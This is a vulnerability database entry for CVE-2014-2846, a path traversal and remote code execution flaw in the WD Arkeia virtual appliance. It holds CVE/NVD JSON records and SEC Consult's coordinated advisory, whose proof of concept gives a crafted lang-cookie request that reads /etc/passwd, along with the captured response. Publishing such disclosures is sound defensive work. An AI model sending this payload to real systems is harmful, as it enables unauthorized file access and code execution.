cvelistv5 - cve-2014-2846

CVE-2014-2846 (GCVE-0-2014-2846)

Vulnerability from cvelistv5 – Published: 2014-04-28 14:00 – Updated: 2024-08-06 10:28

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

Tags

	http://seclists.org/fulldisclosure/2014/Apr/257	mailing-listx_refsource_FULLDISC
	http://www.securityfocus.com/archive/1/531910/100…	mailing-listx_refsource_BUGTRAQ
	http://wiki.arkeia.com/index.php/Path_Traversal_R…	x_refsource_CONFIRM

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:28:46.033Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2014/Apr/257"
          },
          {
            "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-04-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2014/Apr/257"
        },
        {
          "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-2846",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2014/Apr/257"
            },
            {
              "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
            },
            {
              "name": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution",
              "refsource": "CONFIRM",
              "url": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-2846",
    "datePublished": "2014-04-28T14:00:00",
    "dateReserved": "2014-04-10T00:00:00",
    "dateUpdated": "2024-08-06T10:28:46.033Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:westerndigital:arkeia_virtual_appliance_firmware:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"10.2.7\", \"matchCriteriaId\": \"1C920528-2AAC-4C9A-A988-33049F33408C\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin.\"}, {\"lang\": \"es\", \"value\": \"Vulnerabilidad de salto de directorio en opt/arkeia/wui/htdocs/index.php en WD Arkeia Virtual Appliance (AVA) con firmware anterior a 10.2.9 permite a atacantes remotos leer archivos arbitrarios y ejecutar c\\u00f3digo PHP arbitrario a trav\\u00e9s de un ..././ (punto punto barra punto barra) en el par\\u00e1metro lang Cookie, tal y como fue demostrado por una solicitud hacia login/doLogin.\"}]",
      "id": "CVE-2014-2846",
      "lastModified": "2024-11-21T02:07:02.587",
      "metrics": "{\"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:P/I:P/A:P\", \"baseScore\": 7.5, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 6.4, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2014-04-28T14:09:07.877",
      "references": "[{\"url\": \"http://seclists.org/fulldisclosure/2014/Apr/257\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.securityfocus.com/archive/1/531910/100/0/threaded\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://seclists.org/fulldisclosure/2014/Apr/257\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.securityfocus.com/archive/1/531910/100/0/threaded\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-22\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2014-2846\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2014-04-28T14:09:07.877\",\"lastModified\":\"2025-04-12T10:46:40.837\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin.\"},{\"lang\":\"es\",\"value\":\"Vulnerabilidad de salto de directorio en opt/arkeia/wui/htdocs/index.php en WD Arkeia Virtual Appliance (AVA) con firmware anterior a 10.2.9 permite a atacantes remotos leer archivos arbitrarios y ejecutar c\u00f3digo PHP arbitrario a trav\u00e9s de un ..././ (punto punto barra punto barra) en el par\u00e1metro lang Cookie, tal y como fue demostrado por una solicitud hacia login/doLogin.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:westerndigital:arkeia_virtual_appliance_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"10.2.7\",\"matchCriteriaId\":\"1C920528-2AAC-4C9A-A988-33049F33408C\"}]}]}],\"references\":[{\"url\":\"http://seclists.org/fulldisclosure/2014/Apr/257\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\"]},{\"url\":\"http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.securityfocus.com/archive/1/531910/100/0/threaded\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://seclists.org/fulldisclosure/2014/Apr/257\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\"]},{\"url\":\"http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/archive/1/531910/100/0/threaded\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

VAR-201404-0435

Vulnerability from variot - Updated: 2023-12-18 13:53

Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin. Western Digital Arkeia Virtual Appliance is prone to a local file-include vulnerability. An attacker can exploit this issue using directory-traversal strings to view files and execute local script code in the context of the web server process. This may allow the attacker to compromise the application; other attacks are also possible. Western Digital Arkeia Virtual Appliance 10.2.7 and prior versions are vulnerable. It supports data protection, deduplication, and direct backup of disks and tapes. SEC Consult Vulnerability Lab Security Advisory < 20140423-0 > ======================================================================= title: Path Traversal/Remote Code Execution product: WD Arkeia Virtual Appliance (AVA) vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3. fixed version: 10.2.9 CVE number: CVE-2014-2846 impact: critical homepage: http://www.arkeia.com/ found: 2014-03-05 by: M. Lucinskij SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================

Vendor description:

"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and affordable data protection for enterprises seeking to optimize the benefits of virtualization. The AVA offers all the features of the hardware appliance, but permits you to use your own choice of hardware."

source: http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance

Business recommendation:

The identified path traversal vulnerability can be exploited by unauthenticated remote attackers to gain unauthorized access to the WD Arkeia virtual appliance and stored backup data.

SEC Consult recommends to restrict access to the web interface of the WD Arkeia virtual appliance using a firewall until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the affected vendor. Path traversal enables attackers access to files and directories outside the web root through relative file paths in the user input.

An unauthenticated remote attacker can exploit the identified vulnerability in order to retrieve arbitrary files from the affected system and execute system commands.

Proof of concept:

The path traversal vulnerability exists in the /opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie is not properly checked before including a file using the PHP include() function. Example of the request that demonstrates the vulnerability by retrieving the contents of the /etc/passwd file:

POST /login/doLogin HTTP/1.0 Host: $host Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00 Content-Length: 25 Content-Type: application/x-www-form-urlencoded

password=bbb&username=aaa

The response from the affected application:

HTTP/1.1 200 OK Date: Wed, 05 Mar 2014 08:29:35 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Charset: UTF-8 Content-Length: 1217 Connection: close Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin dhcpd:x:177:177:DHCP server:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin {"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n ull]}}

Furthermore, the identified vulnerability can be also exploited to execute arbitrary PHP code/system commands by including files that contain specially crafted user input.

According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3 are affected.

Vendor contact timeline:

2014-03-13: Contacting vendor through support@arkeia.com 2014-03-14: Vendor confirms the vulnerability. 2014-03-17: Vendor provides a quick fix and a release schedule. 2014-04-21: Vendor releases a fixed version 2014-04-23: SEC Consult releases a coordinated security advisory.

Solution:

Update to the most recent version (10.2.9) of Arkeia Network Backup.

More information can be found at: http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution

Workaround:

Advisory URL:

https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab

SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15

Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult? Write to career@sec-consult.com

EOF M. Lucinskij / @2014

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0435",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "arkeia virtual appliance",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "westerndigital",
        "version": "10.2.7"
      },
      {
        "model": "arkeia virtual appliance",
        "scope": null,
        "trust": 0.8,
        "vendor": "western digital",
        "version": null
      },
      {
        "model": "arkeia virtual appliance",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "western digital",
        "version": "10.2.9"
      },
      {
        "model": "arkeia virtual appliance",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "wdc",
        "version": "10.2.7"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2846"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:westerndigital:arkeia_virtual_appliance_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "10.2.7",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2846"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "M. Lucinskij",
    "sources": [
      {
        "db": "BID",
        "id": "67039"
      },
      {
        "db": "PACKETSTORM",
        "id": "126286"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2014-2846",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2014-2846",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-70785",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-2846",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201404-558",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-70785",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2846"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin. Western Digital Arkeia Virtual Appliance is prone to a local file-include vulnerability. \nAn attacker can exploit this issue using directory-traversal strings to view files and execute local script code in the context of the web server process. This may allow the attacker to compromise the application; other attacks are also possible. \nWestern Digital Arkeia Virtual Appliance 10.2.7 and prior versions are vulnerable. It supports data protection, deduplication, and direct backup of disks and tapes. SEC Consult Vulnerability Lab Security Advisory \u003c 20140423-0 \u003e\n=======================================================================\n              title: Path Traversal/Remote Code Execution\n            product: WD Arkeia Virtual Appliance (AVA)\n vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3. \n      fixed version: 10.2.9\n         CVE number: CVE-2014-2846\n             impact: critical\n           homepage: http://www.arkeia.com/\n              found: 2014-03-05\n                 by: M. Lucinskij\n                     SEC Consult Vulnerability Lab\n                     https://www.sec-consult.com\n=======================================================================\n\nVendor description:\n-------------------\n\"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and\naffordable data protection for enterprises seeking to optimize the benefits of\nvirtualization. The AVA offers all the features of the hardware appliance, but\npermits you to use your own choice of hardware.\"\n\nsource:\nhttp://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance\n\n\nBusiness recommendation:\n------------------------\nThe identified path traversal vulnerability can be exploited by unauthenticated\nremote attackers to gain unauthorized access to the WD Arkeia virtual appliance\nand stored backup data. \n\nSEC Consult recommends to restrict access to the web interface of the WD Arkeia\nvirtual appliance using a firewall until a comprehensive security\naudit based on a security source code review has been performed and all\nidentified security deficiencies have been resolved by the affected vendor. \nPath traversal enables attackers access to files and directories outside the\nweb root through relative file paths in the user input. \n\nAn unauthenticated remote attacker can exploit the identified vulnerability in\norder to retrieve arbitrary files from the affected system and execute system\ncommands. \n\n\nProof of concept:\n-----------------\nThe path traversal vulnerability exists in the\n/opt/arkeia/wui/htdocs/index.php script. The value of the \"lang\" cookie\nis not properly checked before including a file using the PHP include()\nfunction. Example of the request that demonstrates the vulnerability by\nretrieving the contents of the /etc/passwd file:\n\nPOST /login/doLogin HTTP/1.0\nHost: $host\nCookie: lang=aaa..././..././..././..././..././..././etc/passwd%00\nContent-Length: 25\nContent-Type: application/x-www-form-urlencoded\n\npassword=bbb\u0026username=aaa\n\nThe response from the affected application:\n\nHTTP/1.1 200 OK\nDate: Wed, 05 Mar 2014 08:29:35 GMT\nServer: Apache/2.2.15 (CentOS)\nX-Powered-By: PHP/5.3.3\nSet-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nSet-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/\nCache-Control: no-cache\nPragma: no-cache\nCharset: UTF-8\nContent-Length: 1217\nConnection: close\nContent-Type: text/html; charset=UTF-8\n\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nsaslauth:x:499:76:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\napache:x:48:48:Apache:/var/www:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin\ndhcpd:x:177:177:DHCP server:/:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\n{\"local\":{\"STATUS\":[\"0\"],\"MESSAGE\":[\"Error code 4, Bad password or\nlogin\"],\"PARAM2\":[\"\"],\"PARAM3\":[null],\"LAST\":[1],\"sessnum\":[null],\"transnum\":[n\null]}}\n\nFurthermore, the identified vulnerability can be also exploited to\nexecute arbitrary PHP code/system commands by including files that\ncontain specially crafted user input. \n\nAccording to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since\n7.0.3 are affected. \n\n\nVendor contact timeline:\n------------------------\n2014-03-13: Contacting vendor through support@arkeia.com\n2014-03-14: Vendor confirms the vulnerability. \n2014-03-17: Vendor provides a quick fix and a release schedule. \n2014-04-21: Vendor releases a 